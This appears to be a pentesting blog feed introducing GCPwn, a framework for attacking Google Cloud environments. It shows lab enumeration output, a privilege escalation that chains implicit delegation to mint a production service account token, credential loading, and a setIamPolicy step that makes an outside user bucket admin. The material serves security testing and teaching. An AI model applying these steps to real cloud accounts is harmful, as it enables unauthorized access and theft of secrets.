[**] Reviewing old-development-bucket-9282734 exit blob counts for this bucket... 

[***] GET Bucket Object 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[**] Reviewing service-account-details-2323232exit blob counts for this bucket... 

[***] GET Bucket Object 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[SUMMARY] GCPwn found 3 Buckets (with up to 10 blobs shown each) in staging-project-1-426001 

- gcf-sources-239052134916-us-central1 

  - DO_NOT_DELETE_THE_BUCKET.md 

  - attacker-function-aff7ccd2-6b13-4f6a-888f-471f15fd3a37/version-1/function-source.zip 

- old-development-bucket-9282734 

  - my_staging_service_key.json 

- service-account-details-2323232 

  - note.txt 

  - staging-project-1-426001-da65b2807066.json 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[**] [staging-project-1-426001] Reviewing projects/239052134916/secrets/ServiceAccountHMACKeys-388372 

[***] GET Base Secret Entity 

[***] TEST Secret Permissions 

[***] LIST Secret Versions 

[****] GET Secret Version 4 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 4 

[****] GET Secret Version 3 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 3 

[****] GET Secret Version 2 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 2 

[****] GET Secret Version 1 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 1 

[SUMMARY] GCPwn found 1 Secret(s) in staging-project-1-426001 

- ServiceAccountHMACKeys-388372 

  - 1: <value_not_found> 

  - 2: <value_not_found> 

  - 3: <value_not_found> 

  - 4: <value_not_found> 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking staging-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found 6 Service Account(s) in staging-project-1-426001 

   - 239052134916-compute@developer.gserviceaccount.com                                                                                                                                         

   - bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                           

   - deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                  

   - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                    

   - staging-project-1-426001@appspot.gserviceaccount.com                                                                                                                                       

   - testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com                                                                                                            

[*] Checking staging-project-1-426001 for roles... 

[**] GET on role projects/staging-project-1-426001/roles/CustomRole... 

[SUMMARY] GCPwn found 1 Custom Role(s) 

   - ListBucketsOnly (projects/staging-project-1-426001/roles/CustomRole)                                                                                                                       

[***********] Ending enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for production-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking production-project-1-426001 for instances... 

[**] Reviewing instance-20240630-025631 

[***] GET Instance 

[***] TEST Instance Permissions 

[SUMMARY] GCPwn found 1 Compute Instance(s) in production-project-1-426001 

- zones/us-central1-c 

  - instance-20240630-025631 

[*] Checking Cloud Compute Project production-project-1-426001... 

[SUMMARY] GCPwn found 1 Compute Project(s) with potential metadata shown below. 

- production-project-1-426001 

  - KEY: KeyValue 

    VALUE: Use secret "serviceAccountKey"  

*Review any truncated data with 'data tables cloudcompute-projects --columns project_id,common_instance_metadata [--csv filename]' 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking production-project-1-426001 for functions... 

[**] Reviewing projects/production-project-1-426001/locations/us-central1/functions/function-12 

[***] GET Individual Function 

[***] TEST Function Permissions 

[SUMMARY] GCPwn found 1 Function(s) in production-project-1-426001 

   - [us-central1] function-12                                                                                                                                                                  

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[*] Checking production-project-1-426001 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in production-project-1-426001 

[*] Checking production-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing bucket-to-see-how-much-stuff-121212121212 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket bucket-to-see-how-much-stuff-121212121212 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[**] Reviewing gcf-v2-sources-506260596801-us-central1 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket gcf-v2-sources-506260596801-us-central1 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[**] Reviewing gcf-v2-uploads-506260596801-us-central1 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket gcf-v2-uploads-506260596801-us-central1 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[**] Reviewing testweoajrpjqfpweqjfpwejfwef 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket testweoajrpjqfpweqjfpwejfwef 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[SUMMARY] GCPwn found 4 Buckets (with up to 10 blobs shown each) in production-project-1-426001 

- bucket-to-see-how-much-stuff-121212121212 

- gcf-v2-sources-506260596801-us-central1 

- gcf-v2-uploads-506260596801-us-central1 

- testweoajrpjqfpweqjfpwejfwef 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[**] [production-project-1-426001] Reviewing projects/506260596801/secrets/test 

[***] GET Base Secret Entity 

[***] TEST Secret Permissions 

[***] LIST Secret Versions 

[****] GET Secret Version 2 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 2 

[****] GET Secret Version 1 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 1 

[**] [production-project-1-426001] Reviewing projects/506260596801/secrets/test-location 

[***] GET Base Secret Entity 

[***] TEST Secret Permissions 

[***] LIST Secret Versions 

[****] GET Secret Version 1 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 1 

[SUMMARY] GCPwn found 2 Secret(s) in production-project-1-426001 

- test 

  - 1: <value_not_found> 

  - 2: <value_not_found> 

- test-location 

  - 1: <value_not_found> 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking production-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found 1 Service Account(s) in production-project-1-426001 

   - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com                                                                                                                 

[*] Checking production-project-1-426001 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[***********] Ending enumeration for production-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for testbench-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking testbench-426001 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project testbench-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in testbench-426001 

[*] Checking Cloud Compute Project testbench-426001... 

[X] STATUS 403: Compute API does not appear to be enabled for project testbench-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking testbench-426001 for functions... 

[X] 403 The Cloud Functions API is not enabled for projects/testbench-426001/locations/- 

[SUMMARY] GCPwn found or retrieved NO Function(s) in testbench-426001 

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[*] Checking testbench-426001 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in testbench-426001 

[*] Checking testbench-426001 for buckets/blobs via LIST buckets... 

[SUMMARY] GCPwn found or retrieved NO Buckets (with up to 10 blobs shown each) in testbench-426001 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking testbench-426001 for service accounts... 

[SUMMARY] GCPwn found 1 Service Account(s) in testbench-426001 

   - role-just-for-testing@testbench-426001.iam.gserviceaccount.com                                                                                                                             

[*] Checking testbench-426001 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for testbench-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

Notice we found some interesting assets in the other projects. This includes a service account in each of the other projects. Assuming we were able to pull the policy bindings at the end, we can try process_iam_bindings to see if we get a nice role summary.

[*]-------------------------------------------------------------------------------------------------------[*]

 

[TRUNCATED] 

 

[******] Summary for serviceAccount:deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountUser 

 

[******] Summary for serviceAccount:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com [******] 

Secret Manager Summary 

  - "projects/239052134916/secrets/ServiceAccountHMACKeys-388372" (in staging-project-1-426001) 

    - roles/secretmanager.secretAccessor 

 

 

[******] Summary for serviceAccount:role-just-for-testing@testbench-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/production-project-1-426001/serviceAccounts/productions-owner-role@production-project-1-426001.iam.gserviceaccount.com" (in production-project-1-426001) 

    - roles/iam.serviceAccountTokenCreator 

 

[******] Summary for serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountKeyAdmin 

  - "projects/testbench-426001/serviceAccounts/role-just-for-testing@testbench-426001.iam.gserviceaccount.com" (in testbench-426001) 

    - roles/iam.serviceAccountTokenCreator 

 

[******] Summary for user:fwdcloudsec2233@gmail.com [******] 

Cloud Compute Summary 

  - "instance-20240630-025631" (in production-project-1-426001) 

    - roles/compute.admin 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountKeyAdmin 

Secret Manager Summary 

  - "projects/506260596801/secrets/test-location" (in production-project-1-426001) 

    - roles/secretmanager.admin 

[TRUNCATED] 

 

[*]-------------------------------------------------------------------------------------------------------[*]

Reviewing the data above we see an interesting avenue of exploitation. Our current service account, testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com, in project staging-project-1-426001 has roles/iam.serviceAccountTokenCreator permissions over service account role-just-for-testing@testbench-426001.iam.gserviceaccount.com in project testbench-426001. This means testbench-serviceaccount-multi has iam.serviceAccounts.implicitDelegation over role-just-for-testing. Furthermore, the service account role-just-for-testing@testbench-426001.iam.gserviceaccount.com has roles/iam.serviceAccountTokenCreator permissions over service account productions-owner-role@production-project-1-426001.iam.gserviceaccount.com in production-project-1-426001. This means role-just-for-testing has iam.serviceAccounts.getAccessToken permissions over productions-owner-role. Thus, by implicit delegation testbench-serviceaccount-multi has iam.serviceAccounts.getAccessToken permissions over productions-owner-role (see diagram above in quick overview) and we should be able to just get an access token for the production service account. 

We could also see part of this by runing the analyze_vulns module to see the first step for implicit delegation. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> modules run analyze_vulns 

[*]-------------------------------------------------------------------------------------------------------[*]

[*****************] Anonymous and/or All Authenticated User Permissions  [*****************] 

[X] No Anonymous Permissions were identified 

[X] No Arbitrary Authenticated User Permissions were identified 

[*****************] IAM Analysis (Roles) [*****************] 

[*] Performing IAM Analysis on Workspace Thus Far... 

[TRUNCATED] 

[******] Vuln Summary for serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - 6:IAM_DIRECT:iam.serviceAccountKeys.create:IAM Service Accounts Service Keys Creator  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountKeyAdmin  

    - 14:IAM_DIRECT:*.*.setIamPolicy:SetIAMPolicy on Respective Resource  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountKeyAdmin  

Service Accounts Summary 

  - "projects/testbench-426001/serviceAccounts/role-just-for-testing@testbench-426001.iam.gserviceaccount.com" (in testbench-426001) 

    - 4:IAM_DIRECT:iam.serviceAccounts.getAccessToken:IAM Service Accounts Access Token Creator  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator  

    - 5:IAM_DIRECT:iam.serviceAccounts.implicitDelegation:IAM Implicit Delegation Allowed  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator  

    - 8:IAM_DIRECT:iam.serviceAccounts.signBlob:IAM Service Accounts Sign Blob  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator  

    - 9:IAM_DIRECT:iam.serviceAccounts.signJwt:IAM Service Accounts Sign JWT  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator  

    - 14:IAM_DIRECT:*.*.setIamPolicy:SetIAMPolicy on Respective Resource  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator 

To exploit this, we will use the exploit module, exploit_generate_access_token, which supports both generating access tokens via a direct link to a service account or though implicit delegation like we are about to attempt. Instead of having to supply all the service accounts in the implicit delegation chain (which you could if you wanted via module flags), we will leverage the “–all-delegation” flag which will auto-detect implicit delegation routes in the enumerated data thus far and present us with implicit delegation routes to choose from. The only catch is the caller needs to have implicit delegation rights on the starting node. In this case we know we have implicit delegation rights over role-just-for-testing so we just choose option 2, and we’re done. Note this will hopefully be a lot cleaner/refactored in the future but demonstrates the core functionality of auto-finding delegation routes. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> modules run exploit_generate_access_token --all-delegation 

[*]-------------------------------------------------------------------------------------------------------[*]

> Choose a path from below to attempt implicit delegation. Note this will only work on fields that give access tokens, but those with impersonation are also shown for your benefit 

>> [1] serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

    (ACCESS TOKEN) -> [testbench-426001] - role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

>> [2] serviceAccount:role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

    (ACCESS TOKEN) -> [production-project-1-426001] - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

>> [3] serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

    (IMPERSONATE) -> [testbench-426001] - role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

    (ACCESS TOKEN) -> [production-project-1-426001] - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

 

> Impersonation routes are provided below. Note these do not end in getting an access token but are still provided for your visiblity. 

>> serviceAccount:role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

    (IMPERSONATE) -> [production-project-1-426001] - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

>> serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

    (IMPERSONATE) -> [testbench-426001] - role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

    (IMPERSONATE) -> [production-project-1-426001] - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

> [4] Exit 

> Choose an option: 2 

[*] Successful API Call. Access Token will last until 2024-07-22 04:22:53+00:00: 

[*] Token: ya29.c.c0ASRK0GZ_v8[REDACTED] 

> Do you want to assume the new credentials? [y/n]y 

[*] Project ID of credentials is: staging-project-1-426001 

[*] Credentials successfully added 

Loading in OAuth2 token. Note it might be expired based on how long its existed... 

[*] Loaded credentials productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC 

[*]-------------------------------------------------------------------------------------------------------[*]

(staging-project-1-426001:productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

  staging-project-1-426001 

  production-project-1-426001 

  testbench-426001 

(staging-project-1-426001:productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC)> projects set production-project-1-426001 

(production-project-1-426001:productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC)> creds info 

 

Summary for productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC: 

Email: productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - production-project-1-426001 

    - staging-project-1-426001 

    - testbench-426001 

 

Access Token: ya29.c.c0ASRK0GZ[REDACTED] 

And voila there it is, we are now the service account in the new project (note we have to “projects set” it after changing) 

Final Notes; TLDR 

This concludes the sample exploit scenario which covered several enumeration, exploit, and process modules. A wiki article should be released in the near future explaining how you can add your own modules/add pull requests. In the meantime feel free to add issues/pull requests as you run into bugs as the tool continues to be refactored/improved. 

The post An Introduction to GCPwn – Parts 2 and 3 appeared first on NetSPI.

]]>
An Introduction to GCPwn – Part 1 https://www.netspi.com/blog/technical-blog/cloud-pentesting/introduction-to-gcpwn-part-1/ Mon, 29 Jul 2024 17:20:44 +0000 https://www.netspi.com/?p=25045 GCPwn is a python-based framework for pentesting GCP environments. While individual exploit scripts exist today for GCP attack vectors, GCPwn seeks to consolidate all these scripts and manage multiple sets of credentials at once (for example, multiple service account keys) all within one framework. With the use of interactive prompts, GCPwn makes enumeration and exploitation […]

The post An Introduction to GCPwn – Part 1 appeared first on NetSPI.

]]>
GCPwn is a python-based framework for pentesting GCP environments. While individual exploit scripts exist today for GCP attack vectors, GCPwn seeks to consolidate all these scripts and manage multiple sets of credentials at once (for example, multiple service account keys) all within one framework. With the use of interactive prompts, GCPwn makes enumeration and exploitation of resources/permissions more trivial to execute aiding the average pentester. The tool also tries to use the newer GCP python SDK as opposed to the older libraries. The idea of a python framework along with the overall presentation builds upon the concepts of Rhino Security’s Pacu tool, which is a python framework for testing AWS

 GCPwn has the following high-level traits: 

  • Accepts/manages GCP credentials of different types  
  • Packages together enumeration/exploit scripts for different services for quick execution. 
  • Tracks permissions passively and allows one to brute force permissions through multiple testIamPermissions calls. 
  • Presents a framework for the research community to build upon using Google’s newest python SDKs.  

This blog is broken out into 3 parts as follows: 

  • Part 1: Cover the core concepts and high-level steps required to use the tool 
  • Part 2 & 3 (will be released at a later date): Walk through example enumeration and exploitation scenarios using GCP in a test environment. Includes Cloud Storage HMAC keys, Cloud Functions metadata endpoint exploit, and IAM implicit delegation.  

As a disclaimer, the tool is changing over time as I work on it. To see the most up-to-date information check out the GCPwn wiki. The tool also has been presented at fwd:cloudsec 2024.

Step 0: Installation 

GCPwn can be installed either through a simple setup script, or via docker. Installation instructions for both methods are covered here. In the local installation, git clone the repository, run “setup.sh”, and start GCPwn with “python3 main.py”. For docker, build the image using the Dockerfile and mount the desired folders at run time to save any data collected while running the tool.

Step 1: Adding Credentials to Tool 

In most cases, you will need to add credentials to GCPwn to subsequently launch modules as that user or service account. GCPwn supports ADC credentials, standalone OAuth2 tokens, and service account JSON key files. GCPwn also supports a couple unauthenticated modules at this point in time.  More details for each method are given below: 

  1. Application Default Credentials (ADC): This terminology will probably change in the future as “ADC” is more applicable to what order GCP fetches credentials, but for now this flow is tied to email/password submissions for simplicity. This path usually involves running a series of “gcloud” (the GCP command line utility) commands. These will allow you to authenticate in a web browser with the username/password which in turn will generate a refresh token and OAuth2 tokens in the background.  While the OAuth2 tokens for ADC credentials usually expire, GCPwn will attempt to auto-refresh credentials via the refresh token when resuming the session. 

Example Credentials 

Email: <email>
Password: <password> 

Set up ADC Credentials Before Launching Tool 

gcloud auth login 
gcloud config project set <project_id> 
gcloud auth application-default login

Add ADC Credentials to GCPwn 

Input: adc leaked_adc_dev_creds 
[*] Project ID of credentials is: my-private-test-project-430102 
[*] Credentials successfully added 
[*] Loading in ADC credentials... 
[*] Attempting to refresh the credentials using the stored refresh token. Note this is normal for brand new OAuth2 credentials added/updated. 
[*] Credentials successfully refreshed... 
[*] Credentials successfully stored/updated... 
[*] Proceeding with up-to-date ADC credentials for leaked_adc_dev_creds... 
[*] Loaded credentials leaked_adc_dev_creds 
(my-private-test-project-430102:leaked_adc_dev_creds)>
  1. Standalone OAuth2 Token: This flow is for valid GCP OAuth2 tokens without corresponding refresh tokens. An example scenario might be getting a service account OAuth2 access token via the GCP metadata endpoint. You have the access token, but there is no corresponding refresh token like the “ADC” route.  An OAuth2 token by itself will usually be valid for X amount of time before expiring. Without a refresh token, GCPwn won’t be able to auto-refresh the OAuth2 access token. However, you can update existing credentials with “creds update” if you swap out the expired OAuth2 token with a new valid OAuth2 token. You might also have to manually set the project ID via “projects set” as shown below.  

Example Credentials 

OAuth2 Token: ya29.a0AXooC[REDACTED]&nbsp;

Add OAuth2 Credentials to GCPwn 

Input: oauth2 webbinroot_oauth2_token ya29.a0AXooC[REDACTED] 
[*] Project ID of credentials is: Unknown 
[*] The project associated with these creds is unknown. To bind the creds to a project specify "creds <credname> set <projectname>". Otherwise you might have limited functionality with resources. 
[*] Loading in our OAuth2 credentials... 
(Unknown:webbinroot_oauth2_token)> projects set my-private-test-project-430102  
[X] my-private-test-project-430102  is not in the list of project_ids. Adding... 
(my-private-test-project-430102 :webbinroot_oauth2_token)> projects
  1. Service Account Keys: This flow is for valid GCP service account keys in the exported JSON format (you could also just build the JSON if you had all the corresponding info). These service account keys are pretty well known and static. At the moment, these don’t have any mechanisms in GCPwn for auto-refreshing as the expectation is their lifetime would not make it necessary. 

Example Credentials 

{ 
  "type": "service_account", 
  "project_id": "[Project_ID]", 
  "private_key_id": "[private_key_id]", 
  "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEv[TRUNCATED]\n-----END PRIVATE KEY-----\n", 
  "client_email": "[client_email]", 
  "client_id": "[client_id]", 
  "auth_uri": "https://accounts.google.com/o/oauth2/auth", 
  "token_uri": "https://oauth2.googleapis.com/token", 
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", 
  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/tes[TRUNCATED]", 
  "universe_domain": "googleapis.com" 
}

Add Service Account Credentials to GCPwn 

Input: service webbinroot_service_key /home/kali/Downloads/my_service_key.json  
Loading in our Service credentials... 
(my-private-test-project-430102 :webbinroot_service_key)>
  1. No Credentials: This flow is for when no credentials are needed. Entering nothing at the credential prompt drops the user into an unauthenticated session context. For example, GCPBucketBrute by Rhino Security was added as a cloud storage unauthenticated module and does not require credentials to run. 

Proceed With No Credentials in GCPwn 

Input:  
(None:None)>

As seen above, each prompt within GCPwn includes the default project ID followed by the name tag for the current credential set. For many modules, especially those in the “enumeration” category, this is the default project ID that the tool would fall back to. To override the default project, you can pass in the following flag with modules: --project-ids <project_id1>,<project_id2>,…. As will be seen in later parts of this blog, if multiple project IDs are known, GCPwn will prompt the user if they want to run modules in the current default project ID or all known project IDs. 

A couple quick final notes about the credentials include: 

  1. The tool saves credentials between runs so resuming the tool (running “python3 main.py”) should allow to resume your credentials context. Note certain credentials like standalone OAuth2 tokens might expire based on the time between runs. 
  2. You can add credentials from within in the tool with creds add as opposed to having run to run “python3 main.py” each time.
  3. You can swap between credentials you have saved within one workspace with creds swap
  4. You can update credentials via creds update. For example, if your OAuth2 token expires and you get a new standalone token, you can run creds update with the flags dictated by the help menu to swap out your expired OAuth2 token with the new one.  
  5. You can see all permissions and other “whoami” information about your creds thus far with creds info.  This command will probably be run a lot, and  creds info –csv saves the summary to a CSV file in “GatheredData” folder ( helpful when dealing with potentially thousands of permissions). 
  6. You can use tokeninfo when adding credentials or from within the current credential set to send the current OAuth2 token to Google’s official “tokeninfo” endpoint detailed here
  7. You can manually set your current project with projects set <project_id> in the tool. This is useful if you manually want to add a project (maybe discovered through recon) to launch modules in, or if the tool is a bit buggy and didn’t add the project ID when adding credentials.

Step 2: Picking An Enumeration/Exploit/Process/Unauthenticated Module 

With the target credentials loaded, it’s now time to put them to work by running modules. Modules in GCPwn are snippets of python code made to achieve certain tasks. Their self-contained nature makes it ideal for open-source contributions in the future (current wiki on this topic is in-progress). 

When in GCPwn you can run a module via modules run <module_name>. As of today, all current/upcoming modules are shown below. 

Modules are broken out into Enumeration, Exploit, Process, and Unauthenticated, and categories usually within a respective service (the “Everything” category being the exception). Note most of these are covered in detail here.

Enumeration Modules 

Enumerate and download/exfiltrate data identified for the specified service. All the data enumerated is stored in GCPwn’s internal SQLite databases which can then be accessed by later exploit modules to make crafting attack vectors easier. By default, most modules when supplied with no flags just enumerate the service metadata (no downloads or testIamPermissions calls). They do so by generally making “List” API calls for the select service followed by “Get” API calls for each entity found.  

Most enumeration modules support one of the following common flags: 

  1. --iam: If the service entity supports allow policies (ex. organizations, folders, projects, cloud functions, buckets, compute instances, etc.), then the enumeration module will run testIamPermissions for the given asset. While I won’t dive into the testIamPermissions API here, I did write something up on hackingthe.cloud if that’s something you wanted to review. In short, testIamPermissions allows you to pass in a list of permissions, and the response is a list of permissions you are allowed to call.  
  2. --download: Exfiltrate/download data to the local filesystem in the GatheredData folder at the root of GCPwn. Running modules run enum_buckets --download, for example, will try to download all blobs enumerated in GCP. As another example, running modules run enum_secrets --download will try downloading all the secret version values. 
  3. --minimal-calls: If you want to ONLY call the “List” APIs and not the “Get” APIs. 
  4. --[resource-name] [resource_name_format]: Specify one or more specific resources. This is useful if you do not have “List” permissions for the given service, but you still know the specific resource name to target. resource_name_format can usually be found by running the -h flag for a given module to see the help menu. 

Besides these common flags, each service module usually has its own specific flags. Two examples are provided below: 

  1. --good-regex: A flag within “enum_buckets” to filter downloads based off python regex. For example, you could use it to target only files ending in a certain extension (ex. modules run enum_buckets --iam --download --good-regex "\.sh”
  2. --version-range: A flag within “enum_secrets” that defines a range of integers to check in terms of secret versions including the keyword “latest”. For example, you could use it to brute force secret versions if you know the secret name but can’t list anything specific (ex. modules run enum_secrets --secrets projects/[project_id]/secrets/test --version-range 1-99,latest –download

Finally, two noticeable enumeration modules to mention are “enum_all” and “enum_policy_bindings”. 

  1. “enum_all”: Accepts the common --iam, --download, etc. flags and will run ALL enumeration modules for you so you don’t have to run each of them individually. Is probably your go-to in most engagements. 
  2. “enum_policy_bindings”: Gathers all IAM policies for all resources gathered thus far to be used in later IAM analysis if needed. This is a pre-requisite for “process_iam_bindings” which returns a summary of IAM roles per user.

Exploit Modules 

Exploit modules are more focused on privilege escalation or pivoting techniques rather than enumerating data. Ideally, most exploit modules can run with ZERO flags and GCPwn will reference any enumerated data thus far to walk you through a “wizard” of sorts. You can also pass in all the flags manually if you want. Among the exploit modules included are: 

  • exploit_generate_access_token: Generate an access token for a given service account 
  • exploit_generate_service_key: Generate a JSON service key for a given service account 
  • exploit_functions_invoke: Create or update a cloud function and subsequently invoke it to pull back the corresponding access tokens for the attached service account.  
  • exploit_[service]_setiampolicy: exploit setIamPolicy on the target resource, usually to set yourself as some type of admin over the resource 

Many of these exploit scripts were based off of rhino security’s research in the area.  

In terms of the “wizard” walkthrough or exploit scripts, a demo is shown below for setIamPolicy for cloud storage buckets. Note that “enum_buckets” was run beforehand, so when you launch “exploit_storage_setiampolicy” with no flags, the tool will reference the buckets enumerated earlier and prompt the user too choose one for exploitation. 

(my-private-test-project-430102:test_blog)> modules run exploit_storage_setiampolicy 
> Choose an existing bucket from below to edit the corresponding policy: 
>> [1] bucket-[TRUNCATED] 
>> [2] gcf-v2-sources-[TRUNCATED] 
>> [3] gcf-v2-uploads-[TRUNCATED] 
>> [4] testw[TRUNCATED] 
> [5] Exit 
> Choose an option: 2 
> Do you want to use newserviceaccount@my-private-test-project-430102.iam.gserviceaccount.com set on the session? [y/n]n 
> Do you want to use an enumerated SA/User or enter a new email? 
>> [1] Existing SA/User 
>> [2] New Member 
> [3] Exit 
> Choose an option: 2 
> Provide the member account email below in the format user:<email> or serviceAccount:<email>: user: [REDACTED]@gmail.com 
> A list of roles are supplied below. Choose one or enter your own: 
>> [1] roles/storage.admin (Default) 
[TRUNCATED] 
> [12] Exit 
> Choose an option: 1 
[*] Binding Member user: [REDACTED]@gmail.com on gcf-v2-sources-[TRUNCATED] to role roles/storage.admin 
[*] Fetching current policy for gcf-v2-sources-[TRUNCATED]... 
[*] New policy below being added to gcf-v2-sources-[TRUNCATED]  
[[TRUNCATED], {'role': 'roles/storage.admin', 'members': ['user:[REDACTED]@gmail.com']}] 
[*] Successfully added user:[REDACTED]@gmail.com to the policy of bucket gcf-v2-sources-[TRUNCATED] 

Unauthenticated Modules 

